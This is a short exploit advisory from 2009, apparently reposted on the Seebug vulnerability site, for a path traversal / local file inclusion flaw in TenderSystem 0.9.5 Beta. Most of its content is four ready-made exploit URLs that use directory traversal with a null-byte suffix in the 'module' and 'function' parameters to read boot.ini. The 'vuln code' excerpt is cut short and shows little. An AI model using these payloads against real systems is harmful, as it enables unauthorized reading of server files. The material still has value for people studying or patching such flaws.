__________ __ __ .___ __ .__ \______ \_____ ____ | | __ _____/ |_ __| _/____ _____ _/ |_| |__ | ___/\__ \ _/ ___\| |/ // __ \ __\/ __ |/ __ \\__ \\ __\ | \ | | / __ \\ \___| <\ ___/| | / /_/ \ ___/ / __ \| | | Y \ |____| (____ /\___ >__|_ \\___ >__| \____ |\___ >____ /__| |___| / \/ \/ \/ \/ \/ \/ \/ \/ ------------------------------------------------------------------------------------------- Note: TESTED LOCALLY WITH XAMPP FOR WINDOWS I was unable to get this to work on a Linux server. Further testing may be required. ------------------------------------------------------------------------------------------ Target: TenderSystem Version: 0.9.5 Beta Site http://www.tendersystem.com/ Demo: http://demo.tendersystem.com/ Date: 2-14-2009 ------------------------------------------------------------------------------------------- Author: Packetdeath Homepage: www.ssteam.ws Contact: yaii_abc@hotmail.com ------------------------------------------------------------------------------------------- Greetz: bi0, AnnexxEmpire and the rest of SSTeam.ws ------------------------------------------------------------------------------------------- Exploit: http://127.0.0.1/tendersystem/main.php?module=../../../../../../../../boot.ini%00.html&function=login http://127.0.0.1/tendersystem/main.php?module=../../../../../../../../boot.ini%00.jpg&function=login http://127.0.0.1/tendersystem/main.php?module=session&function=../../../../../../../../boot.ini%00.html http://127.0.0.1/tendersystem/main.php?module=session&function=../../../../../../../../boot.ini%00.jpg ------------------------------------------------------------------------------------------------------- Vuln code in main.php: // load required files require('modules/generic/ts_main.php'); ?> ------------------------------------------------------------------------------------------------------- Some things are better left unsaid <3 ... That is all. /Packetdeath
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
京公网安备 11010502034610号
暂无评论